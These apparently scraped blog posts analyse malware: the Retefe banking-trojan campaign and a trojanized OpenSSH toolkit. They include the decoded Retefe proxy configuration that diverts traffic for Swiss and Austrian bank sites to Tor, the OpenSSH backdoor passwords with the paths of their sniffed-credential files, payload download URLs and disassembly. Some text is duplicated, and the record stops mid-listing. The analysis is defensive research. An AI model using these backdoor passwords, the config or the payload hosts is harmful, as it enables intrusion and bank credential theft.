echo "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/Pg0KPFByb3hpZmllclByb2ZpbGUgdmVyc2lvbj0iMTAxIiBwbGF0Zm9ybT0iV2luZG93cyIgcHJvZHVjdF9pZD0iMSIgcHJvZHVjdF9taW52ZXI9IjMxMCI+DQogIDxPcHRpb25zPg0KICAgIDxSZXNvbHZlPg0KICAgICAgPEF1dG9Nb2RlRGV0ZWN0aW9uIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgICAgPFZpYVByb3h5IGVuYWJsZWQ9InRydWUiPg0KICAgICAgICA8VHJ5TG9jYWxEbnNGaXJzdCBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICAgIDwvVmlhUHJveHk+DQogICAgICA8RXhjbHVzaW9uTGlzdD4lQ29tcHV0ZXJOYW1lJTsgbG9jYWxob3N0OyAqLmxvY2FsPC9FeGNsdXNpb25MaXN0Pg0KICAgIDwvUmVzb2x2ZT4NCiAgICA8UHJveGlmaWNhdGlvblBvcnRhYmxlRW5naW5lIHN1YnN5c3RlbT0iMzIiPg0KICAgICAgPExvY2F0aW9uPkJhc2VQcm92aWRlcjwvTG9jYXRpb24+DQogICAgICA8VHlwZSBob3RwYXRjaD0idHJ1ZSI+UHJvbG9ndWU8L1R5cGU+DQogICAgPC9Qcm94aWZpY2F0aW9uUG9ydGFibGVFbmdpbmU+DQogICAgPFByb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZSBzdWJzeXN0ZW09IjY0Ij4NCiAgICAgIDxMb2NhdGlvbj5CYXNlUHJvdmlkZXI8L0xvY2F0aW9uPg0KICAgICAgPFR5cGUgaG90cGF0Y2g9ImZhbHNlIj5Qcm9sb2d1ZTwvVHlwZT4NCiAgICA8L1Byb3hpZmljYXRpb25Qb3J0YWJsZUVuZ2luZT4NCiAgICA8RW5jcnlwdGlvbiBtb2RlPSJiYXNpYyIgLz4NCiAgICA8SHR0cFByb3hpZXNTdXBwb3J0IGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxIYW5kbGVEaXJlY3RDb25uZWN0aW9ucyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgICA8Q29ubmVjdGlvbkxvb3BEZXRlY3Rpb24gZW5hYmxlZD0idHJ1ZSIgLz4NCiAgICA8UHJvY2Vzc1NlcnZpY2VzIGVuYWJsZWQ9ImZhbHNlIiAvPg0KICAgIDxQcm9jZXNzT3RoZXJVc2VycyBlbmFibGVkPSJmYWxzZSIgLz4NCiAgPC9PcHRpb25zPg0KICA8UHJveHlMaXN0Pg0KICAgIDxQcm94eSBpZD0iMTAwIiB0eXBlPSJTT0NLUzUiPg0KICAgICAgPEFkZHJlc3M+MTI3LjAuMC4xPC9BZGRyZXNzPg0KICAgICAgPFBvcnQ+OTA1MDwvUG9ydD4NCiAgICAgIDxPcHRpb25zPjQ4PC9PcHRpb25zPg0KICAgIDwvUHJveHk+DQogIDwvUHJveHlMaXN0Pg0KICA8Q2hhaW5MaXN0IC8+DQogIDxSdWxlTGlzdD4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPkxvY2FsaG9zdDwvTmFtZT4NCiAgICAgIDxUYXJnZXRzPmxvY2FsaG9zdDsgMTI3LjAuMC4xOyAlQ29tcHV0ZXJOYW1lJTsgYXBpLmlwaWZ5Lm9yZzwvVGFyZ2V0cz4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgICA8UnVsZSBlbmFibGVkPSJ0cnVlIj4NCiAgICAgIDxOYW1lPnNvZnQ8L05hbWU+DQogICAgICA8QXBwbGljYXRpb25zPmZpcmVmb3guZXhlO2lleHBsb3JlLmV4ZTtjaHJvbWUuZXhlPC9BcHBsaWNhdGlvbnM+DQogICAgICA8VGFyZ2V0cz4qcG9zdGZpbmFuY2UuY2g7Y3MuZGlyZWN0bmV0LmNvbTtlYi5ha2IuY2g7Ki51YnMuY29tO3RiLnJhaWZmZWlzZW5kaXJlY3QuY2g7Ki5ia2IuY2g7Ki5sdWtiLmNoOyouemtiLmNoOyoub25iYS5jaDtlLWJhbmtpbmcuZ2tiLmNoOyouYmVrYi5jaDt3d3dzZWMuZWJhbmtpbmcuenVnZXJrYi5jaDtuZXRiYW5raW5nLmJjZ2UuY2g7Ki5yYWlmZmVpc2VuLmNoOyouY3JlZGl0LXN1aXNzZS5jb207Ki5iYW5rYXVzdHJpYS5hdDsqLmJhd2FncHNrLmNvbTsqLnJhaWZmZWlzZW4uYXQ7Ki5zdGF0aWMtdWJzLmNvbTsqLmJhd2FnLmNvbTsqLmNsaWVudGlzLmNoO2NsaWVudGlzLmNoOypiY3ZzLmNoOypjaWMuY2g7d3d3LmJhbmtpbmcuY28uYXQ7Km9iZXJiYW5rLmF0O3d3dy5vYmVyYmFuay1iYW5raW5nLmF0OypiYWxvaXNlLmNoOyoudWtiLmNoO3Vya2IuY2g7Ki51cmtiLmNoOyouZWVrLmNoOypzemtiLmNoOypzaGtiLmNoOypnbGtiLmNoOypua2IuY2g7Km93a2IuY2g7KmNhc2guY2g7KmJjZi5jaDsqLmVhc3liYW5rLmF0O2ViYW5raW5nLnJhaWZmZWlzZW4uY2g7Ki5vbmlvbjsqYmN2LmNoOypqdWxpdXNiYWVyLmNvbTsqYWJzLmNoOypiY24uY2g7KmJsa2IuY2g7KmJjai5jaDsqenVlcmNoZXJsYW5kYmFuay5jaDsqdmFsaWFudC5jaDsqd2lyLmNoPC9UYXJnZXRzPg0KICAgICAgPEFjdGlvbiB0eXBlPSJQcm94eSI+MTAwPC9BY3Rpb24+DQogICAgPC9SdWxlPg0KICAgIDxSdWxlIGVuYWJsZWQ9InRydWUiPg0KICAgICAgPE5hbWU+RGVmYXVsdDwvTmFtZT4NCiAgICAgIDxBY3Rpb24gdHlwZT0iRGlyZWN0IiAvPg0KICAgIDwvUnVsZT4NCiAgPC9SdWxlTGlzdD4NCjwvUHJveGlmaWVyUHJvZmlsZT4=" | base64 --decode <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <ProxifierProfile version="101" platform="Windows" product_id="1" product_minver="310"> <Options> <Resolve> <AutoModeDetection enabled="false" /> <ViaProxy enabled="true"> <TryLocalDnsFirst enabled="false" /> </ViaProxy> <ExclusionList>%ComputerName%; localhost; *.local</ExclusionList> </Resolve> <ProxificationPortableEngine subsystem="32"> <Location>BaseProvider</Location> <Type hotpatch="true">Prologue</Type> </ProxificationPortableEngine> <ProxificationPortableEngine subsystem="64"> <Location>BaseProvider</Location> <Type hotpatch="false">Prologue</Type> </ProxificationPortableEngine> <Encryption mode="basic" /> <HttpProxiesSupport enabled="false" /> <HandleDirectConnections enabled="false" /> <ConnectionLoopDetection enabled="true" /> <ProcessServices enabled="false" /> <ProcessOtherUsers enabled="false" /> </Options> <ProxyList> <Proxy id="100" type="SOCKS5"> <Address>127.0.0.1</Address> <Port>9050</Port> <Options>48</Options> </Proxy> </ProxyList> <ChainList /> <RuleList> <Rule enabled="true"> <Name>Localhost</Name> <Targets>localhost; 127.0.0.1; %ComputerName%; api.ipify.org</Targets> <Action type="Direct" /> </Rule> <Rule enabled="true"> <Name>soft</Name> <Applications>firefox.exe;iexplore.exe;chrome.exe</Applications> <Targets>*postfinance.ch;cs.directnet.com;eb.akb.ch;*.ubs.com;tb.raiffeisendirect.ch;*.bkb.ch;*.lukb.ch;*.zkb.ch;*.onba.ch;e-banking.gkb.ch;*.bekb.ch;wwwsec.ebanking.zugerkb.ch;netbanking.bcge.ch;*.raiffeisen.ch;*.credit-suisse.com;*.bankaustria.at;*.bawagpsk.com;*.raiffeisen.at;*.static-ubs.com;*.bawag.com;*.clientis.ch;clientis.ch;*bcvs.ch;*cic.ch;www.banking.co.at;*oberbank.at;www.oberbank-banking.at;*baloise.ch;*.ukb.ch;urkb.ch;*.urkb.ch;*.eek.ch;*szkb.ch;*shkb.ch;*glkb.ch;*nkb.ch;*owkb.ch;*cash.ch;*bcf.ch;*.easybank.at;ebanking.raiffeisen.ch;*.onion;*bcv.ch;*juliusbaer.com;*abs.ch;*bcn.ch;*blkb.ch;*bcj.ch;*zuercherlandbank.ch;*valiant.ch;*wir.ch</Targets> <Action type="Proxy">100</Action> </Rule> <Rule enabled="true"> <Name>Default</Name> <Action type="Direct" /> </Rule> </RuleList> </ProxifierProfile>
So in essence, and answering my own question, the configuration of the proxy is not downloaded anywhere, but just hardcoded
and obfuscated in the code.
Angel Alonso-Parrizas
Wednesday, October 12, 2016
Malicious email campaign mimicking Swiss Financial Institutions: Retefe again.
Yesterday, while I was investigating something else I ended up with some malicious email impersonating a Swiss bank.
The email with the subject "Von Ihrem Konto ist 78 Franken abgebucht" contains a 'docx' file named "Credit_Zahlung.docx". Looking deeper, I found quite a few more emails sent around the same time but with different attachments names and subjects, but all of them on behalf of the same Swiss Financial Institution.
The 'docx' file contains an embedded image with a text message inviting to double click in order to see the invoice.
Looking to the file with oledump.py, in Remnux, I see some obfuscated .JS script code inside the DOCX file
I did not deobfuscated the .JS script code, however when I executed the code I saw that several applications were installed and executed. One of them is a Proxy tool (Proxifier) and the other is a Tor client.
The proxy tool is setup to forward all the traffic to some specific URLs through a localhost connection, which in reality is the Tor connection established. The set of URL that goes through the Tor connection are many Swiss banks and Austrian banks. This is how Retefe malware operates to steal the username/passwords of the customers. Luis Rocha explained it some months ago in his blog.
The list of domains affected are
*postfinance.ch
cs.directnet.com
eb.akb.ch
*.ubs.com
tb.raiffeisendirect.ch
*.bkb.ch
*.lukb.ch
*.zkb.ch
*.onba.ch
e-banking.gkb.ch
*.bekb.ch
wwwsec.ebanking.zugerkb.ch
netbanking.bcge.ch
*.raiffeisen.ch
*.credit-suisse.com
*.bankaustria.at
*.bawagpsk.com
*.raiffeisen.at
*.static-ubs.com
*.bawag.com
*.clientis.ch
clientis.ch
*bcvs.ch
*cic.ch
www.banking.co.at
*oberbank.at
www.oberbank-banking.at
*baloise.ch
*.ukb.ch
urkb.ch
*.urkb.ch
*.eek.ch
*szkb.ch
*shkb.ch
*glkb.ch
*nkb.ch
*owkb.ch
*cash.ch
*bcf.ch
*.easybank.at
ebanking.raiffeisen.ch
*.onion
*bcv.ch
*juliusbaer.com
*abs.ch
*bcn.ch
*blkb.ch
*bcj.ch
*zuercherlandbank.ch
Proxifier is able to redirect the traffic for Internet Explorer, Firefox and Chrome. In the screenshot below there is connection by Chrome redirected through the proxy to an Onion URL http://v7yxqrahkza3ewuv.onion
The email with the subject "Von Ihrem Konto ist 78 Franken abgebucht" contains a 'docx' file named "Credit_Zahlung.docx". Looking deeper, I found quite a few more emails sent around the same time but with different attachments names and subjects, but all of them on behalf of the same Swiss Financial Institution.
The 'docx' file contains an embedded image with a text message inviting to double click in order to see the invoice.
Looking to the file with oledump.py, in Remnux, I see some obfuscated .JS script code inside the DOCX file
I did not deobfuscated the .JS script code, however when I executed the code I saw that several applications were installed and executed. One of them is a Proxy tool (Proxifier) and the other is a Tor client.
The proxy tool is setup to forward all the traffic to some specific URLs through a localhost connection, which in reality is the Tor connection established. The set of URL that goes through the Tor connection are many Swiss banks and Austrian banks. This is how Retefe malware operates to steal the username/passwords of the customers. Luis Rocha explained it some months ago in his blog.
The list of domains affected are
*postfinance.ch
cs.directnet.com
eb.akb.ch
*.ubs.com
tb.raiffeisendirect.ch
*.bkb.ch
*.lukb.ch
*.zkb.ch
*.onba.ch
e-banking.gkb.ch
*.bekb.ch
wwwsec.ebanking.zugerkb.ch
netbanking.bcge.ch
*.raiffeisen.ch
*.credit-suisse.com
*.bankaustria.at
*.bawagpsk.com
*.raiffeisen.at
*.static-ubs.com
*.bawag.com
*.clientis.ch
clientis.ch
*bcvs.ch
*cic.ch
www.banking.co.at
*oberbank.at
www.oberbank-banking.at
*baloise.ch
*.ukb.ch
urkb.ch
*.urkb.ch
*.eek.ch
*szkb.ch
*shkb.ch
*glkb.ch
*nkb.ch
*owkb.ch
*cash.ch
*bcf.ch
*.easybank.at
ebanking.raiffeisen.ch
*.onion
*bcv.ch
*juliusbaer.com
*abs.ch
*bcn.ch
*blkb.ch
*bcj.ch
*zuercherlandbank.ch
Looking to the HTTPS certificate we can see that the CA is Comodo, however this is totally a fake certificate which has been imported during the infection to fool the user and avoid the browser warnings.
Actually, for that specific domain the original certificate has been signed by Symantec CA.
Finally, the mimic website requests to introduce the phone number in order to install a maliciuos APK and be able to retrieve the 2FA token.
About this malicious APK I wrote several posts:
http://blog.angelalonso.es/2016/01/2nd-part-of-timba-malware-analysis-apk.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-preparing.html
http://blog.angelalonso.es/2015/10/decrypting-emmental-blowfish-and-base64.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-iii-analyzing.html
http://blog.angelalonso.es/2015/10/malware-analysis-with-androguad.html
http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html
http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-iii-analyzing.html
http://blog.angelalonso.es/2016/01/2nd-part-of-timba-malware-analysis-apk.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-preparing.html
http://blog.angelalonso.es/2015/10/decrypting-emmental-blowfish-and-base64.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-iii-analyzing.html
http://blog.angelalonso.es/2015/10/malware-analysis-with-androguad.html
http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html
http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html
http://blog.angelalonso.es/2015/10/android-memory-analysis-iii-analyzing.html
In essence the TTP from this Threat Actors has not changed that much. However the tool Proxifier to redirect the traffic is something recently introduced.
Angel Alonso-Parrizas
Monday, September 19, 2016
Anatomy of a Real Linux Intrusion Part II (B): OpenSSH trojanized toolkit - different backdoor passwords
This is a short post to add some additional information to previous post.
The default backdoor password that I analysed from the trojanized OpenSSH source code (PRtestD) is different depending on the OS and the architecture. Also, I figured out that the file where all the 'sniffed' password are kept (default is /etc/X11/.pr) is different as well.
As mentioned in my previous post there are 7 different trojanized packages for several OS / architectures:
All the packages (except the default) contains OpenSSH compiled binaries and I assumed the password was the same in all of them, but this is not the case. Let's take a look.
Using 'radare2' I disassembled the 'sym.auth_password' function (where the backdoor password is located) across the different SSHD binaries.
This is the code:
Following the assembly code, I can see the password is: PRtest0
The password is the same than for ARMv6: PRtest0
In this case the password is GZm7HF, but also the file is different '/etc/lps/lps'
In this case the password is GZm7HF also. The file is '/etc/lps/lps' as well
As a summary, the backdoor passwords are:
ARMv7 / ARMv6 = PRtest0
Vyos / Vyos64 = GZm7HF
Default = PRtestD
edgeos = PRtest0
edgeos64 = ??????
The files with the sniffed accounts are:
ARMv7 / ARMv6 = /etc/X11/.pr
Vyos / Vyos64 = '/etc/lps/lps'
Default = /etc/X11/.pr
edgeos = '/etc/lps/lps'
edgeos64 = ???
The default backdoor password that I analysed from the trojanized OpenSSH source code (PRtestD) is different depending on the OS and the architecture. Also, I figured out that the file where all the 'sniffed' password are kept (default is /etc/X11/.pr) is different as well.
As mentioned in my previous post there are 7 different trojanized packages for several OS / architectures:
- armv6 (ARMv6): http://gopremium.mooo.com/.../auto/arm61.tgz
- armv71(ARMv7): http://gopremium.mooo.com/.../auto/arm71.tgz
- Vyos (x86): http://gopremium.mooo.com/.../auto/vyos.tgz
- Vyos64 (x64): http://gopremium.mooo.com/.../auto/vyos64.tgz
- edgeos (MIPS): http://gopremium.mooo.com/.../auto/edgeos.tgz
- edgeos64 (MIPS 64bits): http://gopremium.mooo.com/.../auto/edgeos64.tgz
- default (compile on demand): http://gopremium.mooo.com/.../auto/default.tgz
Using 'radare2' I disassembled the 'sym.auth_password' function (where the backdoor password is located) across the different SSHD binaries.
ARMv7
This is the code:
; UNKNOWN XREF from 0x000ff39c (unk) │ 0x00011100 684b ldr r3, [pc, 0x1a0] ; [0x112a4:4]=0x61260 obj.SECRETPW │ 0x00011102 2f22 movs r2, 0x2f ; '/' │ 0x00011104 d6f80080 ldr.w r8, [r6] │ 0x00011108 4ff0650e mov.w lr, 0x65 ; 'e' │ 0x0001110c d4f80ca0 ldr.w sl, [r4, 0xc] │ 0x00011110 4ff0310c mov.w ip, 0x31 ; '1' │ 0x00011114 9f70 strb r7, [r3, 2] │ ; UNKNOWN XREF from 0x0000ca44 (unk) │ 0x00011116 0846 mov r0, r1 │ 0x00011118 5f71 strb r7, [r3, 5] │ 0x0001111a 0d46 mov r5, r1 │ ; UNKNOWN XREF from 0x000aefe8 (unk) │ 0x0001111c cdf81480 str.w r8, [sp + local_14h] │ 0x00011120 1946 mov r1, r3 │ 0x00011122 83f803e0 strb.w lr, [r3, 3] │ 0x00011126 4ff05008 mov.w r8, 0x50 ; 'P' │ 0x0001112a 89f80270 strb.w r7, [sb, 2] │ 0x0001112e 83f80080 strb.w r8, [r3] │ 0x00011132 4ff05208 mov.w r8, 0x52 ; 'R' │ 0x00011136 89f80820 strb.w r2, [sb, 8] │ 0x0001113a 83f80180 strb.w r8, [r3, 1] │ 0x0001113e 4ff07308 mov.w r8, 0x73 ; 's' │ 0x00011142 89f807c0 strb.w ip, [sb, 7] │ 0x00011146 83f80480 strb.w r8, [r3, 4] │ 0x0001114a 4ff03008 mov.w r8, 0x30 ; '0' │ 0x0001114e 89f80020 strb.w r2, [sb] │ 0x00011152 83f80680 strb.w r8, [r3, 6] │ 0x00011156 7023 movs r3, 0x70 ; 'p'
Following the assembly code, I can see the password is: PRtest0
ARMv6
; XREFS: CALL 0x0002566c │ 0x00012358 f04f2de9 push {r4, r5, r6, r7, r8, sb, sl, fp, lr} │ 0x0001235c 1cd04de2 sub sp, sp, 0x1c │ 0x00012360 60829fe5 ldr r8, [pc, 0x260] ; [0x125c8:4]=0x74d78 obj.__stack_chk_guard__GLIBC_2.4 LEA loc._d_135 ; "xM." @ 0x125c8 │ 0x00012364 60329fe5 ldr r3, [pc, 0x260] ; [0x125cc:4]=0x79268 obj.SECRETPW │ 0x00012368 60629fe5 ldr r6, [pc, 0x260] ; [0x125d0:4]=0x79318 obj.ILOG │ 0x0001236c 00a098e5 ldr sl, [r8] │ 0x00012370 0040a0e1 mov r4, r0 │ 0x00012374 14a08de5 str sl, [sp + local_14h] │ 0x00012378 50a0a0e3 mov sl, 0x50 ; 'P' │ 0x0001237c 00a0c3e5 strb sl, [r3] │ 0x00012380 52a0a0e3 mov sl, 0x52 ; 'R' │ 0x00012384 01a0c3e5 strb sl, [r3, 1] │ 0x00012388 73a0a0e3 mov sl, 0x73 ; 's' │ 0x0001238c 74c0a0e3 mov ip, 0x74 ; 't' │ 0x00012390 65e0a0e3 mov lr, 0x65 ; 'e' │ 0x00012394 04a0c3e5 strb sl, [r3, 4] │ 0x00012398 30a0a0e3 mov sl, 0x30 ; '0' │ 0x0001239c 0c9094e5 ldr sb, [r4, 0xc] │ 0x000123a0 0100a0e1 mov r0, r1 │ 0x000123a4 06a0c3e5 strb sl, [r3, 6] │ 0x000123a8 02c0c3e5 strb ip, [r3, 2] │ 0x000123ac 03e0c3e5 strb lr, [r3, 3] │ 0x000123b0 05c0c3e5 strb ip, [r3, 5] │ 0x000123b4 0150a0e1 mov r5, r1 │ 0x000123b8 0310a0e1 mov r1, r3 │ 0x000123bc 7030a0e3 mov r3, 0x70 ; 'p' │ 0x000123c0 0a30c6e5 strb r3, [r6, 0xa] │ 0x000123c4 6330a0e3 mov r3, 0x63 ; 'c' │ 0x000123c8 0330c6e5 strb r3, [r6, 3] │ 0x000123cc 5830a0e3 mov r3, 0x58 ; 'X' │ 0x000123d0 0530c6e5 strb r3, [r6, 5] │ 0x000123d4 0030a0e3 mov r3, 0 │ 0x000123d8 0c30c6e5 strb r3, [r6, 0xc] │ 0x000123dc 2e30a0e3 mov r3, 0x2e ; '.' │ 0x000123e0 2f20a0e3 mov r2, 0x2f ; section_end..ARM.attributes │ 0x000123e4 3170a0e3 mov r7, 0x31 ; '1' │ 0x000123e8 0930c6e5 strb r3, [r6, 9] │ 0x000123ec 7230a0e3 mov r3, 0x72 ; 'r' │ 0x000123f0 0820c6e5 strb r2, [r6, 8] │ 0x000123f4 0770c6e5 strb r7, [r6, 7] │ 0x000123f8 0020c6e5 strb r2, [r6] │ 0x000123fc 0670c6e5 strb r7, [r6, 6]
The password is the same than for ARMv6: PRtest0
vyos
; CALL XREF from 0x080664dc (sym.mm_answer_authpassword) │ 0x08051f60 83ec5c sub esp, 0x5c │ 0x08051f63 895c244c mov dword [esp + local_4ch], ebx │ 0x08051f67 8b5c2460 mov ebx, dword [esp + local_60h] ; [0x60:4]=0x8048134 section.INTERP ; '`' ; "4...." │ 0x08051f6b 89742450 mov dword [esp + local_50h], esi │ 0x08051f6f 8b742464 mov esi, dword [esp + local_64h] ; [0x64:4]=19 ; 'd' │ 0x08051f73 897c2454 mov dword [esp + local_54h], edi │ 0x08051f77 896c2458 mov dword [esp + local_58h], ebp │ 0x08051f7b 8b7b0c mov edi, dword [ebx + 0xc] ; [0xc:4]=0 │ 0x08051f7e 8b6b28 mov ebp, dword [ebx + 0x28] ; [0x28:4]=0x200034 ; '(' ; "4" │ 0x08051f81 c7442404d0c1. mov dword [esp + local_4h], obj.SECRETPW ; [0x80bc1d0:4]=0x1930100 LEA obj.SECRETPW ; obj.SECRETPW │ 0x08051f89 893424 mov dword [esp], esi │ 0x08051f8c 65a114000000 mov eax, dword gs:[0x14] ; [0x14:4]=1 │ 0x08051f92 8944243c mov dword [esp + local_3ch], eax │ 0x08051f96 31c0 xor eax, eax │ 0x08051f98 c605d0c10b08. mov byte [obj.SECRETPW], 0x47 ; [0x80bc1d0:1]=0 LEA obj.SECRETPW ; obj.SECRETPW │ 0x08051f9f c605d1c10b08. mov byte [0x80bc1d1], 0x5a ; [0x80bc1d1:1]=1 │ 0x08051fa6 c605d2c10b08. mov byte [0x80bc1d2], 0x6d ; [0x80bc1d2:1]=147 │ 0x08051fad c605d3c10b08. mov byte [0x80bc1d3], 0x37 ; [0x80bc1d3:1]=1 │ 0x08051fb4 c605d4c10b08. mov byte [0x80bc1d4], 0x48 ; [0x80bc1d4:1]=116 │ 0x08051fbb c605d5c10b08. mov byte [0x80bc1d5], 0x46 ; [0x80bc1d5:1]=0 │ 0x08051fc2 c605d6c10b08. mov byte [0x80bc1d6], 0 ; [0x80bc1d6:1]=0 │ 0x08051fc9 c605a7c20b08. mov byte [0x80bc2a7], 0x70 ; [0x80bc2a7:1]=2 │ 0x08051fd0 c605a0c20b08. mov byte [0x80bc2a0], 0x63 ; [0x80bc2a0:1]=36 │ 0x08051fd7 c605a5c20b08. mov byte [0x80bc2a5], 0x2f ; [0x80bc2a5:1]=1 │ 0x08051fde c605a4c20b08. mov byte [0x80bc2a4], 0x73 ; [0x80bc2a4:1]=0 │ 0x08051fe5 c6059dc20b08. mov byte [obj.ILOG], 0x2f ; [0x80bc29d:1]=58 LEA obj.ILOG ; ":" @ 0x80bc29d │ 0x08051fec c605a3c20b08. mov byte [0x80bc2a3], 0x70 ; [0x80bc2a3:1]=0 │ 0x08051ff3 c6059ec20b08. mov byte [0x80bc29e], 0x65 ; [0x80bc29e:1]=0 │ 0x08051ffa c605a2c20b08. mov byte [0x80bc2a2], 0x6c ; [0x80bc2a2:1]=29 │ 0x08052001 c6059fc20b08. mov byte [0x80bc29f], 0x74 ; [0x80bc29f:1]=0 │ 0x08052008 c605a9c20b08. mov byte [0x80bc2a9], 0 ; [0x80bc2a9:1]=1 │ 0x0805200f c605a1c20b08. mov byte [0x80bc2a1], 0x2f ; [0x80bc2a1:1]=8 │ 0x08052016 c605a6c20b08. mov byte [0x80bc2a6], 0x6c ; [0x80bc2a6:1]=75 │ 0x0805201d c605a8c20b08. mov byte [0x80bc2a8], 0x73 ; [0x80bc2a8:1]=1 │ 0x08052024 e8e7b3ffff call sym.imp.strcmp │ 0x08052029 85c0 test eax, eax │ ┌─< 0x0805202b 7533 jne 0x8052060 │ │ 0x0805202d c70594900b08. mov dword [obj.secret_ok], 1 ; [0x80b9094:4]=0x841c60d LEA obj.secret_ok ; obj.secret_ok │ │ 0x08052037 b001 mov al, 1 │ │ ; JMP XREF from 0x0805213b (sym.auth_password) │ │ ; JMP XREF from 0x08052112 (sym.auth_password) │ ┌┌──> 0x08052039 8b54243c mov edx, dword [esp + local_3ch] ; [0x3c:4]=0x8048034 section_end.ehdr ; '<' ; "4...4..." │ │││ 0x0805203d 653315140000. xor edx, dword gs:[0x14] │ ┌────< 0x08052044 0f8576010000 jne 0x80521c0 │ ││││ 0x0805204a 8b5c244c mov ebx, dword [esp + local_4ch] ; [0x4c:4]=5 ; 'L' │ ││││ 0x0805204e 8b742450 mov esi, dword [esp + local_50h] ; [0x50:4]=4 ; 'P' │ ││││ 0x08052052 8b7c2454 mov edi, dword [esp + local_54h] ; [0x54:4]=3 ; 'T' │ ││││ 0x08052056 8b6c2458 mov ebp, dword [esp + local_58h] ; [0x58:4]=308 ; 'X' ; "4." │ ││││ 0x0805205a 83c45c add esp, 0x5c │ ││││ 0x0805205d c3 ret ││││ 0x0805205e 6690 nop
In this case the password is GZm7HF, but also the file is different '/etc/lps/lps'
Python 2.7.12 (default, Jun 29 2016, 14:05:02) [GCC 4.2.1 Compatible Apple LLVM 7.3.0 (clang-703.0.31)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> "475a6d374846".decode("hex") 'GZm7HF' >>> "2f6574632f6c70732f6c7073".decode("hex") '/etc/lps/lps' >>>
vyos64
0x0040ba00 48896c24e0 mov qword [rsp - 0x20], rbp │ 0x0040ba05 4889f5 mov rbp, rsi │ 0x0040ba08 48895c24d8 mov qword [rsp - 0x28], rbx │ 0x0040ba0d 4c896424e8 mov qword [rsp - 0x18], r12 │ 0x0040ba12 4c896c24f0 mov qword [rsp - 0x10], r13 │ 0x0040ba17 4889fb mov rbx, rdi │ 0x0040ba1a 4c897424f8 mov qword [rsp - 8], r14 │ 0x0040ba1f be108b6700 mov esi, obj.SECRETPW ; obj.SECRETPW │ 0x0040ba24 4883ec38 sub rsp, 0x38 │ 0x0040ba28 448b670c mov r12d, dword [rdi + 0xc] ; [0xc:4]=0 │ 0x0040ba2c 4c8b6f30 mov r13, qword [rdi + 0x30] ; [0x30:8]=0x38004000000000 ; '0' │ 0x0040ba30 4889ef mov rdi, rbp │ 0x0040ba33 64488b042528. mov rax, qword fs:[0x28] ; [0x28:8]=0x200470 ; '(' │ 0x0040ba3c 4889442408 mov qword [rsp + local_8h], rax │ 0x0040ba41 31c0 xor eax, eax │ 0x0040ba43 c605c6d02600. mov byte [rip + 0x26d0c6], 0x47 ; [0x678b10:1]=178 LEA obj.SECRETPW ; obj.SECRETPW │ 0x0040ba4a c605c0d02600. mov byte [rip + 0x26d0c0], 0x5a ; [0x678b11:1]=122 │ 0x0040ba51 c605bad02600. mov byte [rip + 0x26d0ba], 0x6d ; [0x678b12:1]=64 │ 0x0040ba58 c605b4d02600. mov byte [rip + 0x26d0b4], 0x37 ; [0x678b13:1]=0 │ 0x0040ba5f c605aed02600. mov byte [rip + 0x26d0ae], 0x48 ; [0x678b14:1]=0 │ 0x0040ba66 c605a8d02600. mov byte [rip + 0x26d0a8], 0x46 ; [0x678b15:1]=0 │ 0x0040ba6d c605a2d02600. mov byte [rip + 0x26d0a2], 0 ; [0x678b16:1]=0 │ 0x0040ba74 c60574d12600. mov byte [rip + 0x26d174], 0x70 ; [0x678bef:1]=0 │ 0x0040ba7b c60566d12600. mov byte [rip + 0x26d166], 0x63 ; [0x678be8:1]=165 │ 0x0040ba82 c60564d12600. mov byte [rip + 0x26d164], 0x2f ; [0x678bed:1]=102 │ 0x0040ba89 c6055cd12600. mov byte [rip + 0x26d15c], 0x73 ; [0x678bec:1]=10 │ 0x0040ba90 c6054ed12600. mov byte [rip + 0x26d14e], 0x2f ; [0x678be5:1]=0 LEA obj.ILOG ; obj.ILOG │ 0x0040ba97 c6054dd12600. mov byte [rip + 0x26d14d], 0x70 ; [0x678beb:1]=0 │ 0x0040ba9e c60541d12600. mov byte [rip + 0x26d141], 0x65 ; [0x678be6:1]=0 │ 0x0040baa5 c6053ed12600. mov byte [rip + 0x26d13e], 0x6c ; [0x678bea:1]=0 │ 0x0040baac c60534d12600. mov byte [rip + 0x26d134], 0x74 ; [0x678be7:1]=0 │ 0x0040bab3 c60537d12600. mov byte [rip + 0x26d137], 0 ; [0x678bf1:1]=1 │ 0x0040baba c60528d12600. mov byte [rip + 0x26d128], 0x2f ; [0x678be9:1]=124 │ 0x0040bac1 c60526d12600. mov byte [rip + 0x26d126], 0x6c ; [0x678bee:1]=0 │ 0x0040bac8 c60521d12600. mov byte [rip + 0x26d121], 0x73 ; [0x678bf0:1]=54 │ 0x0040bacf e86cb4ffff call sym.imp.strcmp │ 0x0040bad4 85c0 test eax, eax │ ┌─< 0x0040bad6 7548 jne 0x40bb20 │ │ 0x0040bad8 c70586722600. mov dword [rip + 0x267286], 1 ; [0x672d68:4]=0x784 LEA obj.secret_ok ; obj.secret_ok │ │ 0x0040bae2 b001 mov al, 1 │ │ ; JMP XREF from 0x0040bbec (sym.userauth_none) │ │ ; JMP XREF from 0x0040bbc5 (sym.userauth_none) │ ┌┌──> 0x0040bae4 488b542408 mov rdx, qword [rsp + local_8h] ; [0x8:8]=0 │ │││ 0x0040bae9 644833142528. xor rdx, qword fs:[0x28] │ ┌────< 0x0040baf2 0f8578010000 jne 0x40bc70 │ ││││ 0x0040baf8 488b5c2410 mov rbx, qword [rsp + local_10h] ; [0x10:8]=0x1003e0002 │ ││││ 0x0040bafd 